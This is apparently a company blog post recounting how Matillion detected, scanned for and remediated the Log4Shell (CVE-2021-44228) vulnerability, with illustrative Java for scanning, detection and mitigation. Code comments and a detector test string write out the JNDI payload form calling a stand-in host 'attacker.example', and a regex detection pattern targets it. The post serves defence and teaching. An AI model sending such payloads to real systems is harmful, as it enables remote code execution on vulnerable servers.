
Lessons Learned from the Log4J Vulnerability

 

Early on December 9, 2021, Chen Zhaojun of the Alibaba Cloud Security team announced to the world the discovery of CVE-2021-44228, a new zero-day vulnerability affecting Log4J 2 versions 2.0-beta9 through 2.14.1 (Log4J 1.x is not affected by this CVE). The vulnerability allowed arbitrary remote code execution. As Log4J is one of the most commonly used JARs in the tech world, this announcement sent shockwaves across the entire tech industry.
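For context, the root cause was that Log4J 2's message formatting resolved ${jndi:...} lookup expressions found in logged data, so attacker-controlled input could trigger a remote JNDI lookup and class load. The sketch below is purely illustrative (a hypothetical handler, not Matillion code) of how an ordinary logging call became dangerous on an affected version:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hypothetical handler, shown only to illustrate the CVE-2021-44228 pattern.
// On affected Log4j 2 versions, logging attacker-controlled input such as a
// User-Agent header of "${jndi:ldap://attacker.example/a}" causes the logger
// to resolve the expression and perform a JNDI lookup instead of treating it
// as plain text, opening the door to remote code execution.
public class LoginHandler {

    private static final Logger LOGGER = LogManager.getLogger(LoginHandler.class);

    public void handleLogin(String username, String userAgent) {
        // Both parameters may be attacker-controlled; on vulnerable versions the
        // formatted message is scanned for ${...} lookups after substitution.
        LOGGER.info("Login attempt for {} using agent {}", username, userAgent);
    }
}
```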

 

Matillion is no different from other tech companies, and we took notice. While we exercise and test our response and patching capability on a regular basis, we had not previously been challenged at this scale or with this urgency.

 

A proof-of-concept exploit for this vulnerability was published early in the incident, so we knew it would only be a matter of time before more sophisticated attacks materialized.

Notification

 

The scale and severity of this vulnerability meant that we were notified through a range of different sources. First, our ties to the security and tech community alerted us to stories circulating across smaller media outlets; second, our customer success organization began to receive reports and requests for comment; third, our vendors sent questions on to Matillion.

Mobilization 

 

We quickly mobilized a team to triage and remediate the vulnerability, invoking our incident management process. We activated the necessary avenues for collaboration: a Jira record, our Slack channel, and standing Zoom calls.

 

We immediately began two concurrent processes. First, we wanted to understand the extent of the vulnerability within our environment and product so that we could protect our customers and ourselves. Second, we wanted to ensure that if the vulnerability was present in any of our systems, it was not being actively exploited. 

 

Our engineering and SRE teams began confirming our attack surface across our range of products and services, while our security team translated open-source indicators of compromise into DataDog detection rules so we could spot any signs of exploitation.
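As a rough illustration of what such rules look for (a simplified sketch, not our actual DataDog detections), the common thread across the published indicators was the JNDI lookup string appearing in request or log data:

```java
import java.util.regex.Pattern;

// Simplified sketch of the kind of pattern used across the industry to spot
// Log4Shell probing in request logs. Production detections (including the rules
// we deployed) also cover obfuscated variants such as "${${lower:j}ndi:...}"
// and nested lookups, which this naive pattern would miss.
public class JndiProbeDetector {

    private static final Pattern JNDI_PROBE =
            Pattern.compile("\\$\\{\\s*jndi\\s*:", Pattern.CASE_INSENSITIVE);

    public static boolean looksSuspicious(String logLine) {
        return JNDI_PROBE.matcher(logLine).find();
    }

    public static void main(String[] args) {
        System.out.println(looksSuspicious(
                "GET / HTTP/1.1 User-Agent: ${jndi:ldap://attacker.example/a}")); // true
        System.out.println(looksSuspicious(
                "GET /healthz HTTP/1.1 User-Agent: curl/7.79.1"));                // false
    }
}
```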

 

Finally, as a cloud-native, SaaS-first company we were aware that our supply chain could be vulnerable. Our Governance, Risk, and Compliance team engaged with key suppliers to understand their exposure, confirm that they had not been exploited, and allow us to assess our own risk.

 

Matillion hosts a range of products, and understanding our potentially vulnerable attack surface across each one was important:


Matillion ETL is delivered as a set of machine images available on popular cloud platforms (AWS, GCP, and Azure). Because the image is deployed inside a customer VPC and is not internet-facing, this deployment profile reduces the immediate risk to our customers, but perimeter security should not be relied upon.

 

Matillion Hub and Billing is a set of cloud services that allow our customers to administer their accounts, users, and instances. While these services could potentially have been exploited had the Log4J vulnerability been present, they are not implemented in Java and so were not susceptible to it.


Matillion Data Loader and Change Data Capture are software services that allow customers to perform data loading and streaming operations and are deployed in a hybrid architecture, with some components being cloud-based while agents are deployed in the customer’s environment.

Confirmation

 

At Matillion we use Snyk as a software composition analysis tool to scan our source projects for vulnerable build dependencies. While we already knew that large parts of our Java codebase use java.util.logging rather than Log4J, we needed to confirm that transitive dependencies did not pull this library into our runtime. We therefore tackled the problem from both directions, executing scans of our binary repositories in parallel with source code dependency scans, and used community-provided tooling to scan fat JAR files for embedded dependencies. With over 250 releases and versions of our products, it took some time to assess our exposure to this library.
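The binary-side check ultimately boils down to looking for the vulnerable class inside each artifact. The sketch below is illustrative only (our actual scans used Snyk plus community tooling, and the directory layout here is hypothetical): it flags any JAR, including fat JARs, that bundles Log4J's JndiLookup class.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Enumeration;
import java.util.stream.Stream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

// Minimal sketch: walk a directory of build artifacts and flag any JAR (including
// fat/uber JARs) that bundles Log4j's JndiLookup class, the component at the heart
// of CVE-2021-44228. Real tooling also inspects nested JARs and reports the exact
// bundled Log4j version.
public class JndiLookupScanner {

    private static final String MARKER =
            "org/apache/logging/log4j/core/lookup/JndiLookup.class";

    public static void main(String[] args) throws IOException {
        Path root = Path.of(args.length > 0 ? args[0] : ".");
        try (Stream<Path> paths = Files.walk(root)) {
            paths.filter(p -> p.toString().endsWith(".jar"))
                 .filter(JndiLookupScanner::containsJndiLookup)
                 .forEach(p -> System.out.println("Potentially vulnerable: " + p));
        }
    }

    private static boolean containsJndiLookup(Path jar) {
        try (ZipFile zip = new ZipFile(jar.toFile())) {
            Enumeration<? extends ZipEntry> entries = zip.entries();
            while (entries.hasMoreElements()) {
                if (entries.nextElement().getName().equals(MARKER)) {
                    return true;
                }
            }
        } catch (IOException e) {
            System.err.println("Could not read " + jar + ": " + e.getMessage());
        }
        return false;
    }
}
```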

 

Our alerting configured within DataDog began to pick up activity from the white hat community probing for vulnerable instances of Log4J, confirming that our rules were sensitive enough and functioning as expected.

Remediation

 

The source code scans immediately identified dependencies on vulnerable versions of Log4J in Matillion Data Loader, Partner Connect and some internal services.  Within a few hours we deployed configuration changes in production to disable JNDI lookups as an immediate mitigation for this vulnerability.  We also deployed patched versions of all services to production by the end of the following business day.
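For reference, the interim mitigation widely published at the time was to disable message lookups, either with the -Dlog4j2.formatMsgNoLookups=true JVM flag or the LOG4J_FORMAT_MSG_NO_LOOKUPS=true environment variable on Log4J 2.10 and later (guidance later shifted toward upgrading or removing the JndiLookup class outright). How the flag is applied depends on how each service is launched, so the snippet below is only a sketch of a sanity check that the setting actually reached a running JVM, not our deployment specifics:

```java
// Sketch of a post-deployment sanity check: confirm that the widely published
// interim mitigations for CVE-2021-44228 are visible to the running JVM.
//   JVM flag:             -Dlog4j2.formatMsgNoLookups=true
//   Environment variable: LOG4J_FORMAT_MSG_NO_LOOKUPS=true
// Note: these settings only apply to Log4j 2.10+ and were an interim measure;
// upgrading (or removing JndiLookup.class entirely) remained the real fix.
public class MitigationCheck {
    public static void main(String[] args) {
        System.out.println("log4j2.formatMsgNoLookups = "
                + System.getProperty("log4j2.formatMsgNoLookups", "<not set>"));
        System.out.println("LOG4J_FORMAT_MSG_NO_LOOKUPS = "
                + System.getenv().getOrDefault("LOG4J_FORMAT_MSG_NO_LOOKUPS", "<not set>"));
    }
}
```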

 

In parallel, scans of our binary repositories identified a specific third-party driver that pulled a vulnerable version of Log4J into a specific image of Matillion ETL. We immediately engaged with the partner to obtain a patched version of this driver. As soon as the partner was able to provide an updated driver, we tested and released an updated version of Matillion ETL to complete remediation.

Customer Communication

 

As expected, customers and partners began contacting Matillion through various channels once they learned of the vulnerability. It was critical for Matillion to provide a unified and consistent message through these channels. Early on, we engaged a cross-functional communications team, with a single lead across our Security, Customer, and Marketing teams, to craft the appropriate communications and provide clear updates to our customer and partner organizations.

This team provided updated communications every few hours throughout the incident. In addition, we published a detailed update in the tech notes section of our product documentation, to which customer support could point customers. As requests came in, we continued to provide live updates in our documentation to best advise our customers.

Post-mortem Analysis

 

The scenario for handling such a ubiquitous and severe vulnerability is often the subject of tabletop exercises.  In reality, the response can be messy, with participants stepping over each other, sending engineers in opposing directions, and providing confusing customer communication. 

The need for urgency and parallelism in response is a root cause of some of these pitfalls.  Here are some learnings we took away from our response to this incident:

Clarify roles

From the outset, Matillion’s CISO organization led the response to this issue as a security incident, involving key stakeholders, coordinating activities, and providing communications to the larger organization. The team clarified priorities, drove decision making as needed, and drafted frequent customer communications. This type of leadership is of paramount importance to avoid wasting time and resources. We employ a general principle of GOLD, SILVER, and BRONZE command levels in our incident response, but we also learned that we need to continue to hone our skills through regular testing and rehearsal.

 

Use real-time collaboration tools

In order for the response team (and observers and stakeholders) to respond in a unified way, we created a single set of collaboration channels and pointed internal audiences to them. As the incident grew in size, these channels became congested and slowed decision making; carving out separate channels for operational and tactical decision making was key.

 

Communicate with the community 

As nearly the entire tech community was dealing with a common issue, we followed tech channels as the community at large shared learnings about the vulnerability and its mitigations as they happened. Sharing of mitigations, code-scanning tooling, and event detection rules across the industry was vital in limiting the risk of this vulnerability and shortening the time to mitigate it. An open, collaborative approach is often best suited to dealing with common problems, and this case was no exception.

 

Single source of truth for customers 

As we provided recurring updates to our customers and partners about the status of our response, we needed to keep the various customer channels in sync to minimize the risk of confusion. It was essential to maintain a single source of information and communicate it consistently throughout the organization.

 

Learn more about Matillion Security

 

For more information about Matillion’s security posture, please visit our Security Center at www.matillion.com/security.
